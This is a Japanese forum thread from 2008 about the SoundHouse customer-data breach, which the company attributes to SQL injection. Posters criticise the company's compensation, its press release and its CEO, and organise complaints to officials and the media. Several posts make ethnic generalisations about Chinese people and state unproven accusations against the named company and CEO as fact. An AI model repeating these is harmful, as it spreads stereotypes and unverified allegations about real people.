750 名前:名無しさん@ご利用は計画的に[sage] 投稿日:2008/04/22(火) 16:32:03
とりあえず、ステレオミニプラグ→携帯用平型端子の変換ケーブルをポチッといた。
送料込みで1000クレジット以内に収まって(゚д゚)ウマー
届いたら退会かな。
148名刺は切らしておりまして:2008/04/22(火) 19:17:53 ID:Gaj16yxw
879 名前:名無しサンプリング@48kHz []: 2008/04/21(月) 23:23:37 ID:osViXhEE
1000円使えるの本体のみで送料は別かよ…
149名刺は切らしておりまして:2008/04/22(火) 21:01:38 ID:dBgvPY51
サウンドハウスからの提示に対して、お客様からの判断をして頂いてからって言う話は嘘だったな。
決定稿だし、反論も出来ない。
クレジットカード情報だけ重視しているのも憤慨だ。
150名刺は切らしておりまして:2008/04/22(火) 23:29:52 ID:z370uvvE
>>146
カード屋や関係者が見たら怒りそうな内容だけどな。
今後代引きだけになったりしてw
151名刺は切らしておりまして:2008/04/22(火) 23:46:21 ID:tz/lWe88
クレジットカード会社からしてみたら

「カード交換等の対応にかかった諸経費を負担するわけでもないのに、よくもまあ抜け抜けと・・・・」
「セキュリティ対策も含めて主責任はSH、各所に文句言うのは内々にやれアホ」
152名刺は切らしておりまして:2008/04/22(火) 23:46:29 ID:gmx2xsDV
【キンタマリサーチ】上級研究員がつこうて公安調査庁や稲●会等の個人情報収集バレる【矢●経済研究所】
http://namidame.2ch.net/test/read.cgi/news/1208874918/
153個人情報流出被害の皆様へ:2008/04/23(水) 21:52:23 ID:taxtPooJ
販売業者が、個人情報を預かった時点で、管理責任が生じます。
サウンドハウス代表取締役、社員、対応改善への希望はありません。
最大の被害を出した事件ですから、今後、様々な機関、グループにより、
被害の補償改善が行われます。
悪戯や隠蔽を気にする事無く、推移を見守り、行動に参加しましょう。

1. カード不正使用実被害、個人情報流出被害に遭われた方。
2. 個人情報流出被害に遭われた方。
3. 個人情報、配達注文のご経験のある方。

サウンドハウスでは、電話番号等で過去から膨大な個人情報を所持し続けています。
サイト登録以外でも、サウンドハウスでは個人情報を所持しています。
何も連絡をして来ない、サウンドハウスに、電話問い合わせをされた方なら、
自分の個人情報の存在を不思議に思われた事でしょう。
ご利用経験者の皆様は、様々な、被害、事件にご注意下さい。

1. 管理責任上、加害者サウンドハウス、被害者お客様が成立。
2. 中国、中国人等、矛先を代える発言、発表に過ぎません。
3. セキュリティ等の問題に、お客様の自己責任は存在しません。
154名刺は切らしておりまして:2008/04/24(木) 00:10:34 ID:D73x+2HR
法律を知る 相談窓口を知る 道しるべ
法的トラブルでお困りのときは、まずは「法テラス」までお問い合わせください。
法制度や相談窓口など解決のきっかけとなる情報をご案内するほか、経済的に余裕
のない方には無料の法律相談を行っています。どこに相談してよいか分からない方、
「法的」なトラブルかどうか分からない方も、どうぞお気軽にご利用ください。
http://www.houterasu.or.jp/
155名刺は切らしておりまして:2008/04/24(木) 01:04:25 ID:sMnJdHf1
777 名前:名無しさん@ご利用は計画的に メェル:sage 投稿日:2008/04/23(水) 23:42:50
事件関連の問い合わせ書き込みをまともな質問も含めて全部消してるんだな、、、、
http://s03.megalodon.jp/2008-0407-2047-04/bbs.soundhouse.co.jp/bbs_onkyou/bbs_list.asp?i_start_count=0

778 名前:名無しさん@ご利用は計画的に メェル:sage 投稿日:2008/04/23(水) 23:47:52
だからなんだよ馬鹿が

779 名前:名無しさん@ご利用は計画的に メェル:sage 投稿日:2008/04/23(水) 23:53:19
アヘアヘ
中島カンペー参上か?w
アヘアヘ

780 名前:名無しさん@ご利用は計画的に メェル:sage 投稿日:2008/04/24(木) 00:04:35
>>777
結構頻繁に魚拓取ってるつもりだが、削除速度早くてフォローしきれないので、
お前らも暇な時に魚拓とっておいてくれよ
156個人情報流出被害の皆様へ:2008/04/24(木) 07:30:13 ID:xQR/WB7z
株式会社サウンドハウス 様
代表取締役社長「中島 尚彦」様、従業員各位 様、発表、公式プレスリリース。
「それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております」 
http://www.soundhouse.co.jp/staff/staff.asp
http://www.soundhouse.co.jp/news/20080418.pdf
・非難した、カード会社からの謝罪要求、取引解消。
・政治的、宗教的発言に依る、銀行、企業の取引解消。
・経過説明、謝罪に留めず、思想主張に大きく割いた、自己中心的思想。
・中国製品中心に利益を上げた上での、中国非難。

今後、様々な機関、グループにより、被害の補償改善が行われます。
悪戯や隠蔽を気にする事無く、推移を見守り、行動に参加しましょう。

1. カード不正使用実被害、個人情報流出被害に遭われた方。
2. 個人情報流出被害に遭われた方。
3. 個人情報、配達注文のご経験のある方。

サウンドハウスでは、顧客登録、購入履歴、電話番号等で、
過去から膨大な個人情報を所持し続けています。

サイト登録以外でも、サウンドハウスでは個人情報を所持しています。
何も連絡をして来ない、サウンドハウスに、電話問い合わせをされた方なら、
自分の個人情報の存在を不思議に思われた事でしょう。
ご利用経験者の皆様は、様々な、被害、事件にご注意下さい。

個人情報管理責任上、加害者=サウンドハウス、被害者=お客様が成立。
世論的にも、各省庁、税務等、様々な注目により、過去からの不正などに対して、
サウンドハウスに調査が入る事も、容易に想像出来ます。
157加害者サウンドハウス:2008/04/24(木) 17:05:30 ID:xQR/WB7z
・クレジットカード不正使用実被害者、個人情報流出被害者への問い合わせ返信 
-----------------------------------
この度、お客様には多大なるご迷惑、ご心配をおかけすることに至りましたことを改めて、お詫び申し上げます。
カードの変更手配でお手数をおかけしてしまい、重ねてお詫び申し上げます。
この後4月18日にプレスリリースという形でメールでご案内させていただきましたが、様々な事情により、届いていないという可能性もございます。
申し訳ございませんでした。
今回、4月18日のプレスリリースを通して、弊社のこれまでのスタンス、実際に行ってきたことを詳細にわたり、説明させて頂きました。
こちらに今回の経緯やお客様への補償などについてコメントさせていただいて是非ともご一読の程お願い申し上げます。
http://www.soundhouse.co.jp/news/20080418.pdf
万が一、具体的な被害が生じている場合、各都道府県警察本部のハイテク犯罪相談窓口などにご相談頂くことをお勧めする場合がございます。
・都道府県警察本部のハイテク犯罪相談窓口等一覧
http://www.npa.go.jp/cyber/soudan.htm
この度のことを真摯に受け止め、1日も早く、お客様からの信頼を回復することが出来るよう、スタッフ一同、全力で対応させて頂きます。
以上何卒よろしくお願い致します。
-----------------------------------

・個人情報流出被害者への問い合わせ返信 
-----------------------------------
今回、4月18日のプレスリリースを通して、弊社のこれまでのスタンス、実際に行ってきたことを詳細にわたり、説明させて頂きました。
http://www.soundhouse.co.jp/news/20080418.pdf
弊社はこのように、精一杯の努力をもって顧客サービスに努めているだけでなく、ご迷惑をおかけしたお客様に対する弊社からの謝意として、
色々ご意見はあるかと思いますが、現時点で弊社が10数万人のお客様にできる精一杯の対応として、1,000円のクレジットを皆様に均等にオファーすることと致しました。
何卒ご理解のうえ、ご活用いただければ幸いです。
以上何卒よろしくお願いいたします。
-----------------------------------

「理解出来ません」
158加害者サウンドハウス:2008/04/24(木) 17:35:59 ID:xQR/WB7z
「サウンドハウス問題」の告発先

・各弁護士事務所、掲示板、相談メール等への働きかけ、訴え。
・日本全国津々浦々、被害者在住地から役所、各議員、各政党等事務所への働きかけ、訴え。
・千葉県、成田市、各議員、各政党等事務所への働きかけ、訴え。
・千葉県、成田市、国政レベル、各省庁、役所への働きかけ、訴え。
・マスコミ各社、ワイドショー(朝ズバ等々)へのFax、メールで働きかけ、訴え。

「謝罪無しの逃げ特は許しません > 加害者サウンドハウス」
159名刺は切らしておりまして:2008/04/24(木) 18:53:15 ID:sMnJdHf1
サウンドハウスまとめサイト
http://soundhousejiko.wiki.fc2.com/
160個人情報”管理”責任放棄:2008/04/24(木) 19:39:44 ID:xQR/WB7z
サウンドハウスは「ハイテク犯罪相談窓口などにご相談」する様にメール送信している。
個人情報管理責任はサウンドハウスにあります。
謝罪無き、同情は有り得ません。

成田市役所
〒286-8585 千葉県成田市花崎町760番地 
代表電話番号:0476-22-1111 代表FAX番号:0476-24-1655

消費生活相談 月曜日〜金曜日 10:00〜16:00
消費生活に関する相談 消費生活相談員 消費生活センター
tel.0476-23-1161

もめごと・なやみごと・苦情相談 毎月第4火曜日 10:00〜15:00
人権擁護委員、行政相談委員
市民支援課市民相談室 tel.0476-20-1507
http://www.city.narita.chiba.jp/living/madoguchi/sodan.html

成田市議会議員
http://www.google.co.jp/search?hl=ja&q=成田市議会議員&btnG=検索&lr=

法律相談掲示板
http://www.google.co.jp/search?hl=ja&q=法律相談+掲示板&btnG=検索&lr=

法律相談BBS
http://www.google.co.jp/search?hl=ja&q=法律相談+BBS&btnG=検索&lr=
161被害者及び予備軍の皆様:2008/04/25(金) 13:52:01 ID:cGCbmvmQ
サウンドハウスを一度でも利用された方は、被害者予備軍です。
過去に遡り、購入履歴、連絡先、配達先が企業として保存されています。
葉書さえもケチり、連絡出来る筈の、お客様への報告義務も放棄しました。

現実に発生した、クレジットカード不正使用、個人情報流出、責任放棄。
擁護発言者は「関係者」以外の何者でもありません。
自社掲示板等においても、過去同様の工作が発覚立証されてしまいました。

サウンドハウスの対応は、事件の規模、流出情報の重大性、不正侵入発覚後の対応の不備など、
これだけの量の顧客情報を保有する企業としては、お粗末としか言いようがありません。

過去から、この事件に至るまで、お客様への失言等の数々、企業、社長、社員の品格も、
ご自分達で、プレスリリースとして発表しております。
http://www.soundhouse.co.jp/news/20080418.pdf
音響機器販売界の小嶋進を目指す、代表取締役社長 中島尚彦氏。
この作文を読んで、あきれない方はいらっしゃらないでしょう。
駄文に挫けず、最後までお読み下さい。

現在、各方面働きかけで、個人、行政、各機関、責任放棄について、
着々とサウンドハウス包囲網が機能し始めて来ています。
そして、もはやサウンドハウス社員も、その動きを感じ焦りを覚えています。

果たして、税務をはじめとした内部告発、立ち入り調査等、
サウンドハウスの行方は何処へ向かうのでしょうか。

心無くとも、表面上、穏便に解決を決断出来る、独裁者になられる事を進言します。
162天災:2008/04/25(金) 20:18:26 ID:cGCbmvmQ
千葉・成田などで震度3観測
25日午後6時52分ごろ、千葉県東方沖を震源とする地震があり、同県成田市と旭市で震度3を観測した。
気象庁によると、震源の深さは約50キロ、マグニチュードは4・7と推定される。
この地震による津波の心配はないという。
(2008年4月25日19時05分 読売新聞)
163名刺は切らしておりまして:2008/04/25(金) 21:39:12 ID:Beeymu95
164名刺は切らしておりまして:2008/04/26(土) 00:49:22 ID:j3vSygmv
たたりじゃ!たたりじゃ!神様のたたりじゃ!
165ooo:2008/04/26(土) 01:20:24 ID:uF7lrhob
なるべくカードは止めて銀行振込使うしかない
166名刺は切らしておりまして:2008/04/26(土) 10:41:30 ID:zHsHqv7q
っつーかサウンドハウスを止めた方が良い
167名刺は切らしておりまして:2008/04/26(土) 10:43:34 ID:+swIYa5d


50万サイト以上の『IIS』サーバーがサイバー攻撃の影響下に
http://headlines.yahoo.co.jp/hl?a=20080425-00000011-inet-secu


脆弱性を抱える Microsoft の Web サーバー『Internet Information Services』(IIS) を用いた
Web サイトが、大規模なサイバー攻撃の対象となっている。サイトの訪問者を、悪質コード
のあるサイトにリダイレクトする手口で、被害が急増している。

最初に被害のまん延を検出したセキュリティ会社 Panda Security は、その時点で影響を受けた
IIS サーバーを28万2000台と発表していた。F-Secure もそれから1日と経たずに、同社の公式
Blog の中で、まん延規模について51万サイトを超えると発表した



168名刺は切らしておりまして:2008/04/28(月) 16:31:40 ID:K8wEigqW
134 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 01:30:40 ID:jmgrrYO/
いちいち個人輸入して買うのかよ。マンドクセ

150 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 15:01:35 ID:jmgrrYO/
ぐだぐだループしてないで早く訴訟起こせよ。
口先だけのニート君。

154 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 15:15:01 ID:jmgrrYO/
>>151
イエーイ。
経過レポ ヨロピク。
今どの段階?

155 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 15:53:05 ID:jmgrrYO/
なんだ、口先だけの手続き中かよ。
さすが2ちゃんクオリティー。

157 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 16:07:15 ID:jmgrrYO/
口先だけのチンピラをからかってるだけだよ。
謝罪と賠償で火病ょるのが端から見ててキモイからさー。

159 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 16:11:54 ID:jmgrrYO/
だったらすぐに訴訟起こせ。口先チンピラ。

161 名前:名無しサンプリング@48kHz[sage] 投稿日:2008/04/28(月) 16:18:00 ID:jmgrrYO/
話題変えて話そらしてるだけかよ。口先チンピラ。
169サウンドハウス宣戦布告:2008/04/28(月) 16:47:24 ID:3NlznDAL
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

「本件、これにて終了致します」
「本件、これにて終了致します」
「本件、これにて終了致します」

2008/04/24 23:11:24
サウンドハウスさん、情報漏れユーザーに対する弁明ならび補償については「これにて終了」と受け取ってよろしいのでしょうか。
2008/04/26 2:11:23
すみません。大変お手数かと存じますが、18日発表のPDF報告書には御社代表のマラソン出場状況などが抜けているように思われますので、お知らせ致します。
追加項目として「今回の情報漏えい事件発生後における代表によるマラソン参加」を追記願います。
2008/04/26 13:59:40 「サウンドハウス」
弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております。
3月21日にカード会社より報告を受けて以来、大勢のスタッフと徹夜作業が続いた状況でしたが、3月30日、地元で開催された佐倉朝日健康マラソンは、記事原稿を書く必要性から参加いたしました。
また3月29日、3月30日は棚卸と平行して、この時点でできることはリアルタイムで対応しており、30日(日)夜に完成したLAC社報告書を元に、翌日よりクレジットカード会社と告知、公表にむけての対応を再開、その後も継続して業務に徹しております。
2008/04/26 18:21:30 「サウンドハウス」
メールに関しては、様々なクレームに関しても極力速やかに対応する努力はしておりますが、明らかなイタズラと思われるものや、暴言が際立つものなど、時には対応できない場合もございます。
またこちらの落ち度で見落としている可能性もございます。もしよろしければ再送いただければ幸いです。
2008/04/28 12:33:00 「サウンドハウス」
成田シティージャーナルの記事をご覧頂き、ありがとうございます。
3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています。桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。
健康管理は重要です。本コラムにおいても、それこそ、もっと意味のある、健康的なやりとりをしたいものです。本件、これにて終了致します。
170アンチエイジング:2008/04/28(月) 19:26:47 ID:ogFT/9Qh
「情報漏えい事件発生後における代表によるマラソン参加」
「佐倉健康マラソンで元気一杯 」
株式会社サウンドハウス代表取締役社長 中島尚彦 
http://www.naritacity.com/journal/main/journal_main_080415.asp
http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

「弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております」
「3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています」
「桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。健康管理は重要です」

・サウンドハウス個人情報流出 
「同社によれば、3月11日から22日まで、同社サイトにSQLインジェクションによる攻撃が行われていたという。
流出した可能性がある個人情報は、2007年1月1日から2008年3月22日までに新規会員登録を行った顧客の
個人情報12万2884件のうちの最大9万7500件。流出したデータは、氏名や性別、生年月日、メールアドレス、
パスワードだが、そのうち2万7743件については、カード名義やカード番号、有効期限など含まれていた」

「3月30日以降も、大量にカード不正利用被害が発生しました」
171名刺は切らしておりまして:2008/04/29(火) 07:06:01 ID:LZq5N8kK
ま、中国人に個人情報が渡ったとするととんでもない事件に巻き込まれる危険性は
否定できないなぁ。

被害者の方々には気の毒としか言い様が無い。
172クレジットカード利用が再開できない:2008/04/29(火) 13:44:24 ID:ykDh/69h
株式会社サウンドハウス 代表取締役杜長 中島尚彦 語録 

「サウンドハウスは、人助けの為に創業した会社の歴史があり、今でもその想いは続いています」
「お客様から寄せられている何千件にも上るメールに対して、自らも多くの返事を書かせて頂き」

「2006年、6月29日、中国のプログにおいて何と、サウンドハウスが名指しで公開され、そのサイトに侵入することが成功した事例が解説されていたのです。
そして今年の2月18日、同様に中国のサイトで弊社の名前が再度掲載され、それが引き金となって、3月ll日からの集中攻撃へと発展しました」

「当初からカード会社と意見が対立することもありました。」
「クレジットカードの再開にあたっては、協力してくださるどころか、驚くほど高額な調査費用のかかるサービスを、再開の条件として提示してきました。」
「既に弊社はカードの利用を止め、営業に大きな打撃を受けているにもかかわらず、更に追い込みをかけるように多額な負担を要求してくるのには閉口してしまいました」
「クレジットカード利用が再開できない理由が見当たりません」
「もし本当にセキュリティ対策をクレジットカード会社を重視するならば、加盟店が当初、申請をする時点で、セキュリティ対策がしっかりとられているかどうか、一定の基準を設
けてチェックし、それにバスした店舖のみを加盟店とするべきでしょう」
「ところが現実にはカード会社同士の営業競争があるのでしょうか、加盟店を安易に増やすことが優先され、問題が生じた時にのみ調査をするという、逆の順序になってしまっています」

クレジットカード利用が再開できない 
クレジットカード利用が再開できない 
クレジットカード利用が再開できない
173拝啓サウンドハウス様:2008/04/30(水) 02:27:25 ID:wB9dsFZK
火消し、お仕事ご苦労様です。

加害者 = 実行犯、個人情報管理責任会社サウンドハウス。
被害者 = 各カード会社、お客様。

サウンドハウスを一度でも利用された方は、被害者予備軍です。
過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
連絡可能な葉書等の手段さえも放棄、連絡出来る筈の、お客様への報告義務を放棄しました。

・サウンドハウス個人情報流出 
株式会社サウンドハウス 代表取締役杜長 中島尚彦 
「同社によれば、3月11日から22日まで、同社サイトにSQLインジェクションによる攻撃が行われていたという。
流出した可能性がある個人情報は、2007年1月1日から2008年3月22日までに新規会員登録を行った顧客の
個人情報12万2884件のうちの最大9万7500件。流出したデータは、氏名や性別、生年月日、メールアドレス、
パスワードだが、そのうち2万7743件については、カード名義やカード番号、有効期限など含まれていた」

・情報漏えい事件発生後における代表取締役杜長 中島尚彦によるマラソン参加。
「佐倉健康マラソンで元気一杯 」 http://www.naritacity.com/journal/main/journal_main_080415.asp 
「弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております」
「3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています」
「桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。健康管理は重要です」
・3月30日以降も、大量にカード不正利用被害が発生しました。

サウンドハウスは、「賠償を行うとは記されていません」。
情報流出した可能性のある「顧客12万2884人、全員」に対して、1000円「相当」の「現金ではなくサウンドハウスで使用可能なクレジット」を「贈呈」
「サウンドハウスで商品を購入しなければ何の意味もない」ので、「全く補償になっていない」

通常、クレジットカードを使用した場合、「店舗側はカード会社に、販売促進費として代金の5%の手数料を支払い」
サウンドハウスは5%の手数料を3%のポイント付与に変えただけで、「2%の儲けになる」
ポイントなので「サウンドハウスで使用しなければ意味がありません」
174名刺は切らしておりまして:2008/04/30(水) 14:33:58 ID:yyRr6JDl
さっきサウンドハウスに電話したんだが。
そのまま文字起ししとく。

店員 「あなた様の電話番号教えて下さい」

俺 「○○○−○○○−○○○ですが」

店員 「○○をご注文されております○○県の○○様ですね」

俺 「ハァ?」

携帯番号テキトーに言ったら個人情報丸漏れですよ?
マジでこえーよ


>弊社では、今回の事態を厳粛に受け止め、お客様の信頼回復に社員一同、全力で取り組む所存です。
>弊社では、今回の事態を厳粛に受け止め、お客様の信頼回復に社員一同、全力で取り組む所存です。
>弊社では、今回の事態を厳粛に受け止め、お客様の信頼回復に社員一同、全力で取り組む所存です。

知り合いの携帯番号言えば、何注文したか把握できてしまう。
こーいう情報管理の甘さを中国人に目」つけられていたんじゃねえの。
・株式会社サウンドハウス個人情報流出被害事件
 「お名前」「フリガナ」「性別」「生年月日」
 「弊社サイト ログイン用メールアドレス」「弊社サイト ログイン用パスワード」
 「クレジットカード情報(会社名・カード番号・有効期限・ご名義)」

サウンドハウスを一度でも利用された方は、被害者予備軍です。
過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
連絡可能な葉書等の手段さえも放棄、連絡出来る筈の、お客様への報告義務を放棄しました。

株式会社サウンドハウス http://www.soundhouse.co.jp/
代表取締役社長 中島 尚彦、従業員、発表、公式プレスリリース。
http://www.soundhouse.co.jp/staff/staff.asp
http://www.soundhouse.co.jp/news/20080418.pdf
>プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております。

>2006年、6月29日、中国のプログにおいて何と、サウンドハウスが名指しで公開され、そのサイトに侵入することが成功した事例が解説されていたのです。
>そして今年の2月18日、同様に中国のサイトで弊社の名前が再度掲載され、それが引き金となって、3月ll日からの集中攻撃へと発展しました。

・クレジットカード利用が再開できない 
>当初からカード会社と意見が対立することもありました。
>クレジットカードの再開にあたっては、協力してくださるどころか、驚くほど高額な調査費用のかかるサービスを、再開の条件として提示してきました。
>クレジットカード利用が再開できない理由が見当たりません。

・情報漏えい事件発生後における代表取締役杜長 中島尚彦によるマラソン参加。
http://www.naritacity.com/journal/main/journal_main_080415.asp 
>弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております。
>弊社では、今回の事態を厳粛に受け止め、お客様の信頼回復に社員一同、全力で取り組む所存です。
>サウンドハウスは、人助けの為に創業した会社の歴史があり、今でもその想いは続いています。
>お客様から寄せられている何千件にも上るメールに対して、自らも多くの返事を書かせて頂き。
176名刺は切らしておりまして:2008/04/30(水) 22:01:52 ID:MTo05KZF
品揃えは完璧だったんだけどね
177名刺は切らしておりまして:2008/04/30(水) 22:18:38 ID:orCr9CBc
ま、中国と言う泥棒さんがネットでも徘徊している事に注意しなかった失敗だと思うね。
178アンケート協力のお願い:2008/05/01(木) 06:32:04 ID:5OkFNbHW
「株式会社サウンドハウス個人情報流出被害事件」について、Q1-Q8までのアンケートにご協力下さい。
「株式会社サウンドハウス個人情報流出被害事件」擁護、対応等評価される方、批判的、不満をお持ちの方、
 Q1-Q8まで、総計的算出可能な、簡潔なご回答をご協力お願い致します。

Q1 株式会社サウンドハウス個人情報流出被害事件
  http://www.soundhouse.co.jp/
  顧客の個人情報12万2884件のうちの最大9万7500件。流出したデータは、氏名や性別、生年月日、メールアドレス、
  パスワードだが、そのうち2万7743件については、カード名義やカード番号、有効期限など含まれていた。
  代表取締役社長 中島 尚彦、公式プレスリリース。
  http://www.soundhouse.co.jp/news/20080418.pdf
  >プレスリリースの配信後、それをお読みになったお客様、関係各社の皆様に決めていただくことだと考えております。

Q2 中国製品を率先販売利益を得ている、サウンドハウス侵入名指しで公開放置。
  >2006年、6月29日、中国のプログにおいて何と、サウンドハウスが名指しで公開され、そのサイトに侵入することが成功した事例が解説されていたのです。
  >そして今年の2月18日、同様に中国のサイトで弊社の名前が再度掲載され、それが引き金となって、3月ll日からの集中攻撃へと発展しました。

Q3 クレジットカード利用が再開できない 
  >当初からカード会社と意見が対立することもありました。
  >クレジットカードの再開にあたっては、協力してくださるどころか、驚くほど高額な調査費用のかかるサービスを、再開の条件として提示してきました。

Q4 情報漏えい事件発生後における代表取締役杜長 中島尚彦によるマラソン参加。
  http://www.naritacity.com/journal/main/journal_main_080415.asp 
  >佐倉健康マラソンで元気一杯。
  >弊社代表は、アンチエイジングの一貫として、また地域新聞のライターとして、日々走っております。
  >3月30日の時点においては調査会社の報告待ちということもあり、この時点で出来ることは全て対応した上で、参加を決めています。
  >桜が満開の湖沿いを3時間走るだけで頭が冴えて、その後の仕事にもより一層、気合が入るものです。健康管理は重要です。
179アンケート協力のお願い:2008/05/01(木) 06:32:53 ID:5OkFNbHW
Q5 過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
  連絡可能な葉書等の手段さえも放棄、連絡出来る筈の、お客様への報告義務を放棄しています。

Q6 サウンドハウスが、賠償を行うとは記されていません。
  情報流出した可能性のある顧客12万2884人、全員に対して、1000円相当の現金ではなくサウンドハウスで使用可能なクレジットを贈呈。
  サウンドハウスで商品を購入しなければ何の意味もないので、全く補償になっていない。

Q7 通常、クレジットカードを使用した場合、店舗側はカード会社に、販売促進費として代金の5%の手数料を支払い、
  サウンドハウスは5%の手数料を3%のポイント付与に変えただけで、2%の儲けになる。
  ポイントなので「サウンドハウスで使用しなければ意味がありません。

Q8 今回の事件で、株式会社サウンドハウス 代表取締役社長 中島尚彦、社員の対応、言動に多くの不満が集まった。
  メール、電話、サウンドハウス掲示板で、実際対応を受けた方、対応、言動は如何でしたか ?
  事件報告が「電話で」「メールで」「カード会社から来た」「サウンドハウスから来た」「来ない」
  実害の種類「カード不正使用」「カード変更」「個人情報流出」「不安(確実な断言報告が無い)」「諸手続き、不都合の時間換算被害」「実害心理的被害」
180見本:2008/05/01(木) 07:40:25 ID:5OkFNbHW
>Q1 株式会社サウンドハウス個人情報流出被害事件
プレスリリース最高 ! 全部OK正しいよって読んで決めたよ !

>Q2 中国製品を率先販売利益を得ている、サウンドハウス侵入名指しで公開放置。
お世話になってる中国に、太っ腹還元 ! 日中友好。

>Q3 クレジットカード利用が再開できない 
奴等は国家の的だ ! 我が社の売り上げを知ってるのか !

>Q4 情報漏えい事件発生後における代表取締役杜長 中島尚彦によるマラソン参加。
余裕じゃん、尊敬するしか無い、トップはこうでなきゃね、偉い !

>Q5 過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
税務署が来た時だけで良いじゃん、声小さくしてね、宅配業者の伝票も ? 多いからシカトで無問題。

>Q6 サウンドハウスが、賠償を行うとは記されていません。
全部、敵対クレジット会社が痛いだけだろ、保険 ? 作戦作戦。

>Q7 通常、クレジットカードを使用した場合、店舗側はカード会社に、販売促進費として代金の5%の手数料を支払い、
>  サウンドハウスは5%の手数料を3%のポイント付与に変えただけで、2%の儲けになる。
OK許す、こんなの教えちゃ困るんだよな、チェッ関係者誰 ?

>Q8 今回の事件で、株式会社サウンドハウス 代表取締役社長 中島尚彦、社員の対応、言動に多くの不満が集まった。
>  メール、電話、サウンドハウス掲示板で、実際対応を受けた方、対応、言動は如何でしたか ?
>  事件報告が「電話で」「メールで」「カード会社から来た」「サウンドハウスから来た」「来ない」
>  実害の種類「カード不正使用」「カード変更」「個人情報流出」「不安(確実な断言報告が無い)」「諸手続き、不都合の時間換算被害」「実害心理的被害」
安心だよね、すっかりカード不正利用されたあげく、止まってたでしょ、これ以上、使えないもんね、まぁ自分でもね、無駄遣い減らせたじゃん。
メールなんて、運だよ運、電話来たでしょ、カード会社から。

フィクション (fiction)
181名刺は切らしておりまして:2008/05/01(木) 23:36:53 ID:WknE5fpE
214 名前:経済産業省[age] 投稿日:2008/04/21(月) 20:20:28 ID:7I+LnkpY0
今週、「株式会社サウンドハウス」経済産業省より呼び出しあり。

これどうなったか詳しい人いる?
182名刺は切らしておりまして:2008/05/03(土) 03:30:38 ID:U/ylxjvq
どうなったんだろうね
183名刺は切らしておりまして:2008/05/03(土) 10:36:16 ID:sDsxN0CV
age
184証拠隠滅工作ウィーク:2008/05/03(土) 11:02:58 ID:7y1Ia9Kd
ゴールデンウィーク中の休業のご案内 
ゴールデンウィーク中の休業、営業時間についてはカレンダー通りとなります。 
(4/29 5/3 5/4 5/5 5/6 がお休みです) 

"終結宣言" 2008年4月30日
株式会社サウンドハウス 代表取締役社長 中島尚彦
http://www.soundhouse.co.jp/news/oshirase.asp

"今回、弊社へのサイバー攻撃は、海外を発端とし、しかもそのルーツが2006年まで遡るという手口であり、昨今話題になっている他社の会社内部からの漏洩事件とは一線を画しております"
 だから何 ? 2006年から放置してただけじゃない。

"流出に至ってしまったことにつきましては、当然ながら弊社にも責任があり"
 管理責任を認めました。

"誠心誠意対応することに努め、信頼の回復、そして、より一層充実したサービスをお客様へ提供するために全力で取り組んでまいります"
"リベートプログラムや補償クレジットに留まらず、お客様への対応も行いながら"
 嘘つき放題、メール、電話対応で、客怒らせまくりじゃん。
 カード不正使用、再発行にも"サウンとハウスとして"何も対応しない"と、メール、電話で言い切ってるしね。

"今、サウンドハウスができること、それは最先端のセキュリティ対策を施し、安心してお客様にご利用して頂けるサイトを提供することにあります"
"如何なる努力も惜しまず、積極的に取り組んでおります"
"優れたセキュリティ対策を継続していくことをお約束します"
 IBM HomePage Builder Frame Editor V3.0 for Windows 
 http://bbs.soundhouse.co.jp/bbs_sonota/sonota_index.htm

"これからも皆様から愛される会社を目指し"
 これまでも、愛されていたか ?

> IBM HomePage Builder Frame Editor V3.0 for Windows 
> IBM HomePage Builder Frame Editor V3.0 for Windows 
> IBM HomePage Builder Frame Editor V3.0 for Windows 
185音屋といえばカード漏洩責任放棄:2008/05/05(月) 03:13:10 ID:VBAsHhjC
>Q1 株式会社サウンドハウス個人情報流出被害事件
・百歩譲っても、謝罪の言葉に読めない、「ありのまま」って私事、全て自己主張、感情的。

>Q2 中国製品を率先販売利益を得ている、サウンドハウス侵入名指しで公開放置。
・罪の意識全く無し、自虐企業ですかね。

>Q3 クレジットカード利用が再開できない 
・クレジット会社も、あれだけ言いたい事言われたら撤退するべき。

>Q4 情報漏えい事件発生後における代表取締役杜長 中島尚彦によるマラソン参加。
・二度と消せない汚点語録満載、感謝するしか無いサービス。

>Q5 過去に遡り、購入履歴、連絡先、配達先が企業として、商法上保存されています。
・電話、メールで確認したら電話番号で顧客管理していた。
 全員に、郵送連絡可能なのに、全く努力してない、放棄。

>Q6 サウンドハウスが、賠償を行うとは記されていません。
・カード不正使用に関しても、電話、メールで、サウンドハウスがお客様に損害賠償等を一切行わないと、再三断言。

>Q7 通常、クレジットカードを使用した場合、店舗側はカード会社に、販売促進費として代金の5%の手数料を支払い、
>  サウンドハウスは5%の手数料を3%のポイント付与に変えただけで、2%の儲けになる。
・呆れて、空いた口が塞がらない。

>Q8 今回の事件で、株式会社サウンドハウス 代表取締役社長 中島尚彦、社員の対応、言動に多くの不満が集まった。
